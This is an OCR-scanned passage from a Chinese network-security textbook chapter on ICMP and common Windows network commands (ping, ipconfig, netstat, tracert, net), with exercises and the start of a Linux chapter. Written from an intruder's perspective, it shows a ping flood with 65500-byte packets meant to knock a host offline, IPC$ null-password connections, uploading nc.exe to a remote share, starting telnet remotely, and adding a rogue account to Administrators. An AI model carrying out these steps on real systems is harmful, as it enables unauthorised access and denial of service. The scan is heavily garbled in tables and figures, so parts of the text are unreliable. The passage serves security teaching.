故障 并 解决 常见 的 TCP/IP 连接 问题 。 分 析 ping 指令 的 数据 报 ,如 图 2-11 所 示 。 具 体 实验 
步骤 参见 第 9 章 实验 五 。 


类 型 (8 位 ) | 代码 (8 位 ) 校 验 和 (16 位 ) 
标识 符 序号 
数据 


2-10 ICMP 头 结构 图 2-11 ICMP 数据 报 
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从 图 2-11 看 出 ,类 型 为 8, 代码 为 0, 表 示 查 询 回 送 请 求 (ping 命令 请 求 )。 如 果 类 型 为 
0, 代 码 为 0, 表示 查询 回 送 应 答 (ping 命令 应 答 ) ,具体 ICMP 报 文 类 型 如 图 2-12 所 示 。 


类 型 | 代码 描 3x 查询 | 差错 
0 O | 回 射 应 答 Cping 应 答 ) y 
目标 不 可 达 

0 | 网 络 不 可 达 

1 | 主机 不 可 达 

2 | 协议 不 可 达 

3 | 端口 不 可 达 

4 | 需要 分 片 但 设置 了 不 分 片 比特 
3 5 | 源 站 选 路 失败 

6 

A 

8 

9 


目的 网 络 不 认识 

目的 主机 不 认识 

源 主 机 被 隔离 (作废 不 用 ) 
目的 网 络 被 强制 禁止 

10 | 目的 主机 被 强制 禁止 

11 | 由 于 服务 类 型 TOS, 网 络 不 可 达 
12 | 由 于 服务 类 型 TOS, 主 机 不 可 达 
13 | 由 于 过 滤 ,通信 被 强制 禁止 
14 | 主机 越权 

15 | 优先 权 中 止 生效 

4 0 | 源 端 被 关闭 (基本 流 控制 ) 
重 定向 

对 网 络 重 定向 

对 主机 重 定向 

对 服务 类 型 和 网 络 重 定向 

对 服务 类 型 和 主机 重 定 向 

回 射 请 求 (Ping 请 求 ) v 
路 由 器 通告 v 
路 由 器 请 求 v 
超时 
11 o | 传输 期 间 生存 时 间 为 0 v 
1 | 在 数据 报 组 装 期 间 生存 时 间 为 0 v 
参数 问题 
坏 的 人 P 关 部 (包括 各 种 差错 ) v 
缺少 必要 的 选项 4 
DIOE ES 
IT] US 
信息 请 求 (作废 不 用 ) 
信息 应 答 (作废 不 用 ) 
地 址 掩 码 请 求 

地 址 掩 码 应 答 


a 


和 


o ojoj% w = o 


10 


12 


13 
14 
15 
16 
17 
18 


o o|o olo o|- e 
A LA, RIAL 


图 2-12 ICMP 报 文 类 型 
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2.2 常用 的 网 络 命令 


2.2.1 网 络 诊断 工具 ping 


ping 不 仅仅 是 Windows 下 的 命令 ,在 UNIX 和 Linux 下 也 有 这 个 命令 。ping 只 是 一 
个 通信 协议 ,是 TCP/IP 协议 的 一 部 分 。ping 是 Windows 系统 自 带 的 一 个 可 执行 命令 , 利 
用 它 可 以 检查 网 络 是 否 能 够 连通 ,用 好 它 可 以 很 好 地 帮助 我 们 分 析 判 定 网 络 故障 。 

应 用 格式 : ping IP 地 址 。 该 命令 还 可 以 加 许多 参数 使 用 ,具体 操作 是 输入 ping 按 回 车 
即 可 看 到 详细 说 明 。 


2.2.2 ping 命令 参数 


下 面 参照 ping 命令 的 帮助 说 明 来 介绍 使 用 的 技巧 ,ping 只 有 在 安装 了 TCP/IP 协议 以 
后 才 可 以 使 用 。 


ping [- t] [-a] [- n count] [- 1 length] [- f] [- i ttl] [- v tos] [ - r count] [ - s count] 
[ - j computer - list] | [ - k computer - list] [~ w timeout] destination- list 
Options: 


(1) -t Ping the specified host until stopped. To see statistics and continue -type 
Control-Break; To stop - type Control-C. 
不 停 地 ping 对 方 主机 ,直到 你 按 下 Ctrl 十 C RE. 
此 功能 没有 什么 特别 的 技巧 ,不 过 可 以 配合 其 他 参数 使 用 ,将 在 下 面 提 到 。 
(2) -a Resolve addresses to hostnames. 
解析 计算 机 NetBIOS 名 。 
示例 : C:\>ping -a192.168.1.21 
Pinging mal imei [192.168.1.21] with 32 bytes of data: 
Reply from 192.168.1.21: bytes = 32 time< 10ms TTL = 254 
Reply from 192.168.1.21: bytes = 32 time« 10ms TTL = 254 
Reply from 192.168.1.21: bytes = 32 time < 10ms TTL = 254 
Reply from 192.168.1.21: bytes = 32 time« 10ms TTL = 254 
Ping statistics for 192.168.1.21: 
Packets: Sent = 4,Received = 4,Lost = 0 (0% loss), Approximate round trip times in 
milli - seconds: 
Minimum = Oms,Maximum = Oms, Average = Oms 


从 上 面 就 可 以 知道 IP 为 192. 168. 1. 21 的 计算 机 NetBIOS 名 为 malimei。 

(3) -n count Number of echo requests to send. 

发 送 count 指定 的 echo 数据 包 数 。 

在 默认 情况 下 ,一 般 都 只 发 送 4 个 数据 包 , 通 过 这 个 命令 可 以 自己 定义 发 送 的 个 数 ,对 
衡量 网 络 速度 很 有 帮助 ,比如 想 测试 发 送 50 个 数据 包 的 返回 的 平均 时 间 为 多 少 ,最 快 时 间 
为 多 少 , 最 慢 时 间 为 多 少 就 可 以 通过 以 下 获知 : 

C:V» ping - n 50 202.103.96.68 

Pinging 202.103.96.68 with 32 bytes of data: 


Reply from 202.103.96.68: bytes = 32 time = 50ms TTL = 241 
Reply from 202.103.96.68: bytes = 32 time = 50ms TTL = 241 
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Reply from 202.103.96.68: bytes = 32 time= 50ms TTL = 241 
Request timed out. 


Reply from 202.103.96.68: bytes = 32 time- 50ms TTL = 241 

Reply from 202.103.96.68: bytes- 32 time- 50ms TTL - 241 

Ping statistics for 202.103.96.68: 

Packets: Sent = 50,Received = 48,Lost = 2 (4% loss),Approximate round trip times in milli- 
seconds: 

Minimum = 40ms,Maximum = 51ms, Average = 46ms 


从 以 上 我 们 就 可 以 知道 在 给 202. 103. 96. 68 发 送 50 个 数据 包 的 过 程 当 中 ,返回 了 48 
个 ,其 中 有 两 个 由 于 未 知 原因 丢失 ,这 48 个 数据 包 当 中 返回 时 间 最 短 为 40ms, 最 长 为 
5lms, 平 均 返回 时 间 为 46ms。 

(4) -I size Send buffer size. 

定义 echo 数据 包 大 小 。 

在 默认 的 情况 下 Windows 的 ping 发 送 的 数据 包 大 小 为 32B, 我 们 也 可 以 自己 定义 它 
的 大 小 ,但 有 一 个 大 小 的 限制 ,就 是 最 大 只 能 发 送 65 500B, 也 许 有 人 会 问 为 什么 要 限制 到 
65 500B, 因 为 Windows 系列 的 系统 都 有 一 个 安全 漏洞 (也 许 还 包括 其 他 系统 ) ,就 是 当 向 对 
方 一 次 发 送 的 数据 包 大 于 或 等 于 65 532B 时 ,对 方 就 很 有 可 能 死机 ,所 以 微软 公司 为 了 解决 
这 一 安全 漏洞 限制 了 ping 的 数据 包 大 小 。 虽 然 微软 公司 已 经 做 了 此 限制 ,但 这 个 参数 配合 
其 他 参数 以 后 危害 依然 非常 强大 ,如 可 以 通过 配合 -t 参数 来 实现 一 个 带 有 攻击 性 的 操作 ， 
(以 下 介绍 带 有 人 危险 性 , 仅 用 于 实验 ,请 勿 轻易 施 于 别人 机 器 上 ,否则 后 果 自 负 ) 

C:\> ping — 1 65500 -t 192.168.1.21 

Pinging 192. 168. 1. 21 with 65500 bytes of data: 


Reply from 192. 168. 1.21: bytes = 65500 time < 10ms TTL = 254 
Reply from 192. 168. 1.21: bytes = 65500 time < 10ms TTL = 254 


这 样 它 就 会 不 停 地 向 192. 168. 1. 21 计算 机 发 送 大 小 为 65 500B 的 数据 包 ,如 果 你 只 有 
一 台 计 算 机 也 许 没有 什么 效果 ,但 如 果 有 很 多 计算 机 那么 就 可 以 使 对 方 完全 瘫痪 ,假如 我 们 
同时 使 用 10 台 以 上 计算 机 ping 一 台 Windows 2000 Professional 系统 的 计算 机 时 ,不 到 5 
分 钟 对 方 的 网 络 就 已 经 完全 瘫痪 ,网 络 严 重 堵塞 ,HTTP 和 FTP 服务 完全 停止 ,高 版 本 的 
windows 已 经 修复 此 漏洞 。 

(5) -f Set Don't Fragment flag in packet. 

在 数据 包 中 发 送 “ 不 要 分 段 "标志 。 

在 一 般 情况 下 发 送 的 数据 包 都 会 通过 路 由 分 段 再 发 送 给 对 方 ,加 上 此 参数 以 后 路 由 就 
不 会 再 分 段 处 理 。 

(6) -i TTL Time To Live. 

指定 TTL 值 在 对 方 的 系统 里 停留 的 时 间 。 

此 参数 同样 是 帮助 你 检查 网 络 运转 情况 的 。 

(7) -v TOS Type Of Service. 

将 “服务 类 型 "字段 设置 为 TOS 指定 的 值 。 

(8) -r count Record route for count hops. 


在 “记录 路 由 ”字段 中 记录 传 出 和 返回 数据 包 的 路 由 。 
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在 一 般 情 况 下 你 发 送 的 数据 包 是 通过 一 个 个 路 由 才 到 达 对 方 的 ,但 到 底 是 经 过 了 哪些 
路 由 呢 ? 通过 此 参数 就 可 以 设 定 你 想 探测 经 过 的 路 由 的 个 数 ,不 过 限制 在 了 9 个 ,也 就 是 说 
你 只 能 跟踪 到 9 个 路 由 ,以 下 为 示例 。 

C:V» ping -nl -r 9 202.96.105.101 (发 送 一 个 数据 包 , 最 多 记录 9 个 路 由 ) 

Pinging 202.96.105.101 with 32 bytes of data: 

Reply from 202.96.105.101: bytes = 32 time- 10ms TTL = 249 

Route: 202.107.208.187 一 > 

202.107.210.214 一 > 

61.153.112.70 -> 

61.153.112.89 -> 

202.96.105.149 一 > 

202.96.105.97 一 > 

202.96.105.100 一 > 

202.96.105.150 一 > 

61.153.112.90 

Ping statistics for 202.96.105.101: 

Packets: Sent = 1l,Received = 1,Lost = 0 (0% loss), 

Approximate round trip times in milli- seconds: 


Minimum = 10ms,Maximum = 10ms,Average = 10ms 


从 上 面 就 可 以 知道 从 本 机 到 202. 96. 105. 101 一 共通 过 了 202. 107. 208. 187,202. 107. 
210. 214,61. 153. 112. 70,61. 153. 112. 89,202. 96. 105. 149,202. 96. 105. 97,202. 96. 105. 
100,202. 96. 105. 150.61. 153. 112. 90 这 9 个 路 由 。 

(9) -j host-list Loose source route along host-list. 

利用 host-list 指定 的 计算 机 列表 路 由 数据 包 , 连 续 计 算 机 可 以 被 中 间 网 关 分 隔 ( 路 由 稀 
HRO IP. 允许 的 最 大 数量 为 9。 

(10) -k host-list Strict source route along host-list. 

利用 host-list 指定 的 计算 机 列表 路 由 数据 包 ,连续 计算 机 不 能 被 中 间 网 关 分 隔 (路 由 严 
格 源 ),IP 允许 的 最 大 数量 为 9。 

(11) -w timeout Timeout in milliseconds to wait for each reply. 

指定 超时 间隔 ,单位 为 毫秒 。 此 参数 没有 什么 其 他 技巧 。 

(12) fg Windows 7 中 ,-4 强行 使 用 IPv4.-6 强行 使 用 IPv6 ,在 局 域 网 中 知道 对 方 主机 
名 字 就 可 知道 他 们 的 IPv4 地 址 和 IPv6 地 址 了 。 

(13) ping 命令 的 其 他 技巧 : 在 一 般 情况 下 还 可 以 通过 ping 对 方 让 对 方 返回 给 你 的 
TTL 值 大 小 ,粗略 的 判断 目标 主机 的 系统 类 型 是 Windows 系列 还 是 UNIX/Linux 系列 ,一 
般 情 况 下 Windows 系列 的 系统 返回 的 TTL ffe 100—130 之 间 , 而 UNIX/Linux 系列 的 系 
统 返回 的 TTL 值 在 240—255 之 间 。 

当然 TTL 的 值 在 对 方 的 主机 里 是 可 以 修改 的 , Windows 系列 的 系统 可 以 通过 修改 注 
册 表 以 下 键 值 来 实现 。 

[HKEY LOCAL MACHINE\sys tem\CurrentControlSet\Services\Tcpip\Parameters] 


"DefaultTTL" = dword:000000FF 
255 — FF, 128 — 80,64 —— 40,32 —— 20 
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ping 是 个 使 用 频率 极 高 的 网 络 诊断 程序 ,用 于 确定 本 地 主机 是 否 能 与 另 一 台 主机 交换 
(发 送 与 接收 ) 数 据 包 。 根 据 返回 的 信息 ,就 可 以 推断 TCP/IP 参数 是 否 设置 得 正确 以 及 运 
行 是 否 正常 。 需 要 注意 的 是 ,成 功 地 与 另 一 台 主 机 进行 一 次 或 两 次 数据 报 交 换 并 不 表示 
TCP/IP 配 置 就 是 正确 的 ,必须 执行 大 量 的 本 地 主机 与 远程 主机 的 数据 报 交 换 , 才 能 确信 
TCP/IP 的 正确 性 。 


2.2.3 网 络 诊断 工具 ipconfig 


ipconfig 指令 显示 所 有 TCP/IP 网 络 配置 信息 、 刷 新 动态 主机 配置 协议 (Dynamic Host 
Configuration Protocol, DHCP) 和 域名 系统 (DNS) 设 置 。 

使 用 不 带 参 数 的 ipconfig 可 以 显示 所 有 适配器 的 LP 地 址 、 子 网 掩 码 和 默认 网 关 。 

1. ipconfig 命令 参数 

ipconfig /all: 显示 本 机 TCP/IP 配置 的 详细 信息 。 

ipconfig /release: DHCP 客户 端 手工 释放 IP 地 址 。 

ipconfig /renew: DHCP 客户 端 手工 向 服务 器 刷新 请 求 。 

ipconfig /flushdns; 清除 本 地 DNS 缓存 内 容 。 

ipconfig /displaydns: 显示 本 地 DNS 内 容 。 

ipconfig /registerdns: DNS 客户 端 手工 向 服务 器 进行 注册 。 

ipconfig /showclassid; 显示 网 络 适 配器 的 DHCP 类 别 信息 。 

ipconfig /setclassid: 设置 网 络 适配器 的 DHCP 类 别 。 

2. ipconfig 命令 举例 

在 RUN( 运 行 ) 窗 口中 输入 CMD 进去 DOS 窗口 。 

在 盘 符 提示 符 中 输入 : ipconfig /all 后 回 车 。 

显示 如 下 。( 若 想 查 查 自己 或 网 络 中 存在 的 网 络 信息 就 用 这 种 方法 ) 

Windows IP Configuration [Windows IP 配置 】 中文 意 思 , 下 同 ) 


Host Name: ze : PCNAME【 域 中 计算 机 名 、 主 机 名 了 
Primary Dns Suffix ....... : [Æ DNS 后 级 】 

Mode Type sinui vr ters : Unknown [15 452578] 

IP Routing Enabled........ ; No【kIP 路 由 服务 是 否 启用 】 
WINS Proxy Enabled........ : No [WINS 代理 服务 是 否 启用 】 


Ethernet adapter:【 本 地 连接 】 
Connection-specific DNS Suffix : 【连接 特定 的 DNS 后 级 】 


Description ........... : Realtek RTL8168/8111 PCI-E Gigabi【 网 卡 型 号 描述 】 
Physical Address......... : 00-1D-7D-71-A8-D6〖【 网 卡 MAC 地 址 】 

DHCP Enabled........... : No【 动 态 主 机 设置 协议 是 否 启用 】 

IP Address. ........... : 192. 168. 90. 114 KIP 地 址 】 

Subnet Mask ........... : 255. 255. 255. 0【 子 网 掩 码 】 

Default Gateway ......... : 192. 168. 90. 254 KRU R9 3&1 


DHCP Server. ........ : 192.168. 90. 88 [DHCP 服务 器 IP] 
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DNS Servers ........... : 221.5. 88. 88 [DNS 服务 器 地 址 】 
Lease Obtained........... : 2011 4E 4 H 1 5 8& 13; 54 [IP 地 址 租用 开始 时 间 】 
Lease Expires ............ : 2011 4E 4 H 10 $8: 13; 54 [IP 地 址 租用 结束 时 间 】 


2.2.4 netstat 命令 


netstat 指令 显示 活动 的 连接 、 计 算 机 监听 的 端口 .以 太 网 统计 信息 、IP 路 由 表 、IPv4 统 
计 信 息 (IP ICMP.TCP 和 UDP 协议 ) ,使 用 netstat-an 命令 可 以 查看 目前 活动 的 连接 和 开 
放 的 端口 ,这 是 网 络 管理 员 查 看 网 络 是 否 被 和 人 侵 的 最 简单 方法 。 使 用 的 方法 如 下 所 示 。 


C:\Documents and Settings\Administrator > netstat -an 


Proto Local Address Foreign Address State 

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:912 0.0.0.0:0 LISTENING 
TCP 127. 0.0. 1:1027 0.0.0.0:0 LISTENING 
TCP 192. 168. 1. 2:139 0.0.0.0:0 LISTENING 
TCP 192. 168. 1. 2:2532 220. 181. 132. 154 :80 ESTABLISHED 
TCP 192. 168. 1. 2:3186 220.181.111. 161:80 CLOSE WAIT 
TCP 192.168.1.2:3187 220.181.111.148:80 CLOSE WAIT 
TCP 192.168.1.2:3188 124.238.238.119:80 CLOSE WAIT 
TCP 192.168.1.2:3190 180.149.132.165:80 CLOSE WAIT 
TCP 192.168.1.2:3216 220.181.111.148:80 CLOSE WAIT 
TCP 192.168.1.2:3228 180.149.131.170:80 CLOSE WAIT 
TCP 192.168.1.2:3242 180.149.131.88:80 CLOSE WAIT 
TCP 192.168.1.2:3247 220.181.112.75:80 CLOSE WAIT 
TCP 192.168.1.2:3252 220.181.112.75:80 CLOSE WAIT 
TCP 192.168.1.2:3260 220.181.164.53:80 CLOSE WAIT 
TCP 192.168.1.2:3266 220.181.111.115:80 CLOSE WAIT 
TCP 192.168.81.1:139 0.0.0.0:0 LISTENING 
TCP 192.168.126.1:139 0.0.0.0:0 LISTENING 


LISTENING : 侦 听 来 自 远方 的 TCP 端口 的 连接 请 求 。 
ESTABLISHED: 代表 一 个 打开 的 连接 。 
CLOSE-WAIT: 等 待 从 本 地 用 户 发 来 的 连接 中 断 请 求 。 
netstat 命令 参数 的 一 般 格式 为 : C: ND netstat /? 
显示 协议 统计 信息 和 当前 TCP/IP 网 络 连 接 。 


NETSTAT [ -a] [ -b] [ - e] [- nl [7o] [ -p Proto] [- r] [-s] [-v] 


-a 显示 所 有 连接 和 监听 端口 。 

-b 显示 包含 于 创建 每 个 连接 或 监听 端口 的 可 执行 组 件 。 在 某 些 情况 下 已 知 可 执行 组 
件 拥有 多 个 独立 组 件 ,并且 在 这 些 情况 下 包含 于 创建 连接 或 监听 端口 的 组 件 序列 被 显示 。 

-e 显示 以 太 网 统计 信息 。 此 选项 可 以 与 -s 选项 组 合 使 用 。 

-以 数字 形式 显示 地 址 和 端口 号 。 此 选项 可 以 与 -a 选项 组 合 使 用 。 
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-o 显示 与 每 个 连接 相关 的 所 属 进程 ID。 

-p proto 显示 proto 指定 的 协议 的 连接 ,proto 可 以 是 下 列 协议 之 一 : TCP UDP, 
TCPv6 或 UDPv6。 如 果 与 -s 选项 一 起 使 用 以 显示 按 协 议 统计 信息 ,proto 可 以 是 下 列 协 议 
之 一 : IP,IPv6, ICMP,ICMPv6, TCP, TCPv6, UDP 或 UDPv6 。 

[显示 路 由 表 。 

s 显示 按 协议 统计 信息 。 默 认 显 示 IP, IPv6, ICMP, ICMPv6, TCP, TCPv6, UDP 和 
UDPv6 的 统计 信息 。 

p 选项 用 于 指定 默认 情况 的 子 集 。 

v 与 -b 选项 一 起 使 用 时 将 显示 包含 于 为 所 有 可 执行 组 件 创 建 连接 或 监听 端口 的 组 件 
interval 重新 显示 选 定 的 统计 信息 ,每 次 显示 之 间 和 暂停 时 间 间 隔 ( 以 秒 计 )。 按 Ctrl 十 C 停止 
重新 显示 统计 信息 。 如 果 省 略 ,netstat 显示 当前 配置 信息 (只 显示 一 次 )。 


2.2.5 Tracert 命令 


用 程序 ,用 于 确定 TP 数据 包 访 问 目标 所 采取 的 路 径 。 


Tracert( 跟 踪 路 由 ) 是 路 由 跟踪 
Tracert 命令 使 用 用 IP 生存 时 间 (TTL) 字 段 和 ICMP 错误 消息 来 确定 从 一 个 主机 到 网 络 上 
其 他 主机 所 经 过 的 路 由 。 该 命令 能 把 送出 的 到 某 一 远程 计算 机 的 请 求 包 所 经 过 的 全 部 路 由 
都 显示 出 来 ,如 该 路 由 的 IP 是 多 少 , 通 过 该 IP 的 时 延 是 多 少 等 。 例 如 ,要 去 www. qq. com. 
tracert www. qq. com 经 过 的 路 由 如 图 2-13 所 示 , 由 于 安全 考虑 ,一 般 服 务 器 设置 成 禁止 
tracert, 当 跟 踪 路 由 时 ,显示 请 求 超时 。 


) 192.168.2.1 
17.19 56. 
119.167.91.28 
119.167?.86. 


219.158.99 
9.66 


图 2-13 路 由 跟踪 


2.2.6 nt 命令 


net 命令 是 网 络 命令 中 最 重要 的 一 个 ,必须 透彻 掌握 它 的 每 一 个 子 命令 的 用 法 ,因为 它 
的 功能 实在 是 太 强 大 了 ,这 就 是 微软 提供 的 最 好 的 入 侵 工具 。 首 先 让 我 们 来 看 一 看 它 都 有 
哪些 子 命令 ,在 cmd 下 输入 net 回 车 ,重点 了 解 几 个 入 侵 者 常用 的 子 命令 ,具体 使 用 步骤 参 
见 第 9 章 A 

1. net view 


使 用 此 命令 查看 远程 主机 的 共享 资源 。 
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命令 格式 为 net view \\IP, 如 图 2-14 所 示 ,查看 IP 地 址 下 的 共享 文件 和 文件 夹 。 


5* Cs WINDOWS syston32Vcnd. ex [-;5[x] 
Media State ..... =... o. i Media disconnected 


:NDocuments and 人 view \\192.168.1.2 


在 \M92.168.1.2 的 共享 资 


注释 


Documents and Settings dministrator? 


图 2-14 net view 显示 共享 资源 


2. net use 

把 远程 主机 的 某 个 共计 
如 图 2-15 所 示 , 把 192. 168. 1.2 下 的 亏 
的 内 容 , 即 显示 malimei 目录 的 内 容 


Ci\WINDO¥S\systen32\cnd. exe ix] 


2:NDocuments and Settings Vidministrator?net use z: \\192.168.1.2\nalinei 


:NDocuments and Settings Vidministrator)z: 


PE z 中 的 卷 是 文档 
卷 的 序列 号 是 88@2-EA22 


z: 的 目录 


Pe14-81-24 12: <DIR> 5 
2014-01-24 <DIR> es 
EE <DIR> ， 368U 盘 保镖 隔离 的 文件 
306,176 981 .ppt 
14,926,336 882.ppt 
5,897,216 003.ppt 
531,456 BOIndex.pp 


图 2-15 net use 共享 资源 映射 为 本 地 盘 符 


与 远程 计算 机 建立 信任 连接 ,命令 格式 为 net use \\IP\IPC$ password /user: 
图 2-16 所 示 ,表示 与 192. 168. 1. 2 建立 信任 连接 ,密码 为 空 , 用 户 名 为 administrator 


tf 源 映射 为 本 地 盘 符 ,命令 格式 为 net use x: \\IP\sharename, 
享 名 为 malimei 的 目录 映射 为 本 地 的 Z 盘 ,4 


显示 Z 


name, 如 


建立 了 


IPC$ 连接 后 ,就 可 以 上 传 文件 了 : copy nc. exe \\192. 168. 1. 2Vipe $ ,如 图 2-17 所 示 ,表示 把 


本 地 目录 下 的 nc. exe 传习 


| 远程 主机 ,结合 后 面 要 介绍 的 其 他 命令 就 可 能 达到 入 侵 的 效果 。 


e 


TFET EFA 
178 个 文件 3.017 
38 个 目录 


\\192.168.1.2\ipc$ 
IPC 
ok 


:\Documents and Settings Widministrator), 


图 2-16 net use 建立 信任 连接 


e C:\FINDOFS\systen32\cad. exe 


:NDocuments and Settings Adninistratorydir 
gna C 中 的 卷 是 win XP 
的 序列 号 是 D4B3-DBBE 


C:NDocuments and Settings Widministrator 的 目录 


19:21 — «DIR» 
Dai4-81-26 19: <DIR> ae 
Pei3-18-18 15: «DIR» fippData 
22: «DIR Favorites 
bei3-109-18 15: <DIR> Funshion 
98: 691 funshion.ini 
Deii-as-15 19: <DIR> My Documents 
19: 9 nc.exe 
«DIR» 「 开始 ] 菜单 
12: <DIR> 桌面 
件 691 E 
d» 34.919.943.972 可 用 字 节 


:NDocuments and Settings Widministrator?copy nc.exe 192.168.1.5 ipc$ 


已 


:NDocuments and Settings Adninistrator), z 


图 2-17 建立 信任 连接 后 上 传 文件 


net user 的 其 他 命令 : 

查看 和 账户 有 关 的 情况 ,包括 新 建 账户 .删除 账户 查看 特定 账户 .激活 账户 .账户 禁用 
等 。 这 对 黑客 人 侵 是 很 有 利 的 ,最 重要 的 是 它 为 克隆 账户 提供 了 前 提 。 输 入 不 带 参 数 的 
net user, 可 以 查看 所 有 用 户 pai 的 

net user abcd 1234 /add, 新 建 一 有 有 户 名 为 abcd, 
成 员 。 

net user abcd /del, 将 用 户 名 为 abcd 的 用 户 删除 

net user abcd /active:no, 将 用 户 名 为 abcd 的 用 户 禁 用 

net user abcd /active:yes, 激 活用 户 名 为 abcd 的 用 户 


码 为 1234 的 账户 ,默认 为 user 组 
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net user abcd, 查 看 用 户 名 为 abed 的 用 户 的 情况 。 

3. net start 

使 用 它 来 启动 远程 主机 上 的 服务 。 当 你 和 远程 主机 建立 连接 后 ,如 果 发 现 它 的 什么 服 
务 没 有 启动 ,而 你 又 想 使 用 此 服务 ,就 可 以 使 用 这 个 命令 来 启动 。 

用 法 : net start servername, servername 是 要 启动 的 服务 名 字 , 如 果 要 启动 telnet 服务 ， 


应 为 net start telnet, 就 成 功 启 动 了 telnet 服务 ,如 图 2-18 所 示 


>: \Docunents and Settings Adninistrator), 


a vo 


2-18 ”启动 telnet 服务 


4. net stop 


若 发 现 远程 主机 的 某 个 服务 不 需要 了 ,利用 这 个 命令 停 掉 


就 可 以 了 ,用 法 和 net start 相同 。 
5. net localgroup 
查看 所 有 和 用 户 组 有 关 的 信息 和 进行 相关 操作 。 输 入 不 带 参数 的 net localgroup 即 列 
出 当前 所 有 的 用 户 组 ,如 图 2-19 所 示 


strator?net start telnet 


C:\Documents and Settings Mdninistrator> 


图 2-19 显示 当前 所 有 的 用 户 组 
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- 


在 人 侵 过 程 中 ,黑客 一 般 利用 它 来 把 某 个 账户 提升 为 Administrators 组 账户 ,这 样 利用 
这 个 账户 就 可 以 控制 整个 远程 主机 了 ,如 图 2-20 所 示 


and SettingsMidninistratordnet user nalinei 1234 /add 


Documents and Midninistrator?net user malimei 
JP. 


mAdninistrato 
“None 


NDocunents and Settings Widninistrator》 


i — Te BuERORSE 0 conmocse — (Bose EM 


图 2-20 ”把 普通 用 户 加 入 到 超级 用 户 组 


用 法 : net localgroup groupname username /add 
net user malimei 1234 /add, 首 先 用 上 面 的 方法 建立 一 个 用 户 ,名 字 为 malimei， 


E d 
密码 是 1234, 


步骤 


net localgroup administrators malimei /add ,把 malimei 用 户 加 入 到 Administrators 超 
级 用 户 组 。 
net user malimei, 查 看 用 户 的 状态 


38 计算 机 网 络 安全 与 实验 教程 


6. net time 


这 个 命 


个 命令 可 以 查看 远程 主机 当前 的 时 间 。 如 果 你 的 目标 只 是 进入 到 远程 主机 里 面 , 那 

么 也 许 就 用 不 到 这 个 命令 了 。 但 简单 的 入 侵 成 功 了 ,难道 只 是 看 看 吗 ? 黑客 们 会 进一步 渗 
透 ,就 连 远 程 主机 当前 的 时 间 都 需要 知道 。 
用 法 : net time \\IP, 如 图 2-21 所 示 。 


\Docunen Nidninistrator: 
\5192.168.1.5 ë 814/1/29 


C:\Documents and Settings Administrator) 


2-21 显示 远程 主机 的 时 间 


一 、 选 择 题 


1. 通过 ,主机 和 路 由 器 可 以 报告 错误 并 交换 相关 的 状态 信息 。 

A. IP 协议 B. TCP 协议 C. UDP 协议 D. ICMP 协议 
2. 常用 的 网 络 服务 中 ,DNS 使 用 

A. UDP 协议 B. TCP 协议 C. IP 协议 D. ICMP 协议 
3. 网 际 协议 编号 为 6, 表 示 是 协议 。 

A. UDP 协议 B. TCP 协议 C. IP 协议 D. ICMP 协议 
4. 网 际 协 议 编号 为 十 进 制 的 17, 表 示 是 协议 

A. IP 协议 B. TCP 协议 C. UDP 协议 D. ICMP 协议 
二 、 填空 题 
1l. IP 层 的 协议 ,TCP 是 层 的 协议 ,UDP 是 层 的 协议 。 
2. 在 连接 请 求 中 ,SYN= .ACK— ,连接 响应 时 ,SYN 王 i 

ACK= 。 确 认 时 ,SYN= ,ACK= 


3. 显示 当前 TCP/IP 网 络 配 置信 息 , 如 IP 地 址 、 子 网 掩 码 和 默认 网 关 的 命令 
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是 


4. 查看 计算 机 上 的 用 户 列表 的 命令 是 

5. 将 用 户 名 为 abed 的 用 户 删除 的 命令 是 

三 、 简 答题 

1. 简 述 TCP 和 UDP 协议 的 区 别 。 

2. 简 述 ping 指令 „ipconfig 指令 netstat 指令 , net 指令 的 功能 和 用 途 。 

3. 请 分 析 IP 头 部 : 45 00 00 30 52 52 40 00 80 06 2c 23 c0 a8 01 01 d8 03 e2 15, 


第 二 部 分 ”网络 安全 的 防御 技术 


BIR 操作 系统 安全 配置 


WoW Linux 操作 系统 的 设置 。 
W 掌握 Windows 2003 Server 操作 系统 的 设置 。 


目前 服务 器 常用 的 操作 系统 有 三 类 : UNIX、 Linux 和 Windows NT/2000/2003 
Server。 这 些 操 作 系 统 都 是 符合 C2 级 安全 级 别 的 操作 系统 ,但 是 都 存在 不 少 漏洞 ,如 果 对 
这 些 漏洞 不 了 解 , 不 采取 相应 的 安全 措施 ,就 会 将 操作 系统 完全 暴露 给 入 侵 者 。 


3.1 Linux 操作 系统 


3.1.1 Linux 操作 系统 介绍 


Linux 是 一 套 可 以 免费 使 用 和 自由 传播 的 类 UNIX 操作 系统 ,是 由 全 世界 成 千 上 万 的 
程序 员 设计 和 实现 的 ,其 目的 是 建立 不 受 任 何 商品 化 软件 的 版 权 制 约 的 、 全 世界 都 能 自由 使 
用 的 UNIX 兼容 产品 。Linux 最 早 开始 于 一 位 名 叫 Linus Torvalds 的 计算 机 业余 爱好 者 ， 
当时 他 是 芬兰 赫尔辛基 大 学 的 学 生 , 目 的 是 想 设计 一 个 代替 Minix( 由 一 位 名 叫 Andrew S. 
Tanenbaum 的 计算 机 教授 编写 的 一 个 操作 系统 示 教 程序 ) 的 操作 系统 。 这 个 操作 系统 可 用 
于 386,486 或 奔腾 处 理 器 的 个 人 计算 机 上 ,并且 具有 UNIX 操作 系统 的 全 部 功能 。Linux 
是 一 个 免费 的 操作 系统 ,用 户 可 以 免费 获得 其 源 代 码 ,并 能 够 随意 修改 。 

# rpm -qif 'cat' (获取 cat. 源 代码 的 方法 ) 


比如 , 想 找 到 ls,cat,grep,less 等 这 些 命令 的 源 代码 ,可 以 使 用 软件 包 管理 工具 ,以 cat 
的 源 代码 为 例 ， 


# which cat 

/bin/cat 

£ rpm -qif /bin/cat 

Name: coreutils Relocations: (not relocatable) 

Version: 5.97 Vendor: CentOS 

Release: 14. e15 Build Date: Sat 24 May 2008 11:19:56 PM CST 
Install Date: Tue 03 Nov 2009 03:18:40 AM CST Build Host: builder10. centos. org 
Group: System Environment/Base Source RPM: coreutils - 5.97 - 14. el5. src. rpm 
Size: 9021731 License: GPLv2 * 


Signature: DSA/SHA1, Sun 15 Jun 2008 07:29:51 AM CST, Key ID a8a447dce8562897 

URL: http://www. gnu. org/software/coreutils/ 

Summary: The GNU core utilities: a set of tools commonly used in shell scripts 

Description: These are the GNU core utilities. This package is the combination of the old GNU 
fileutils, sh- utils, and textutils packages. 
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由 上 可 以 看 到 cat 是 coreutils 中 的 一 个 工具 。 它 的 主页 在 http://www. gnu. org/ 
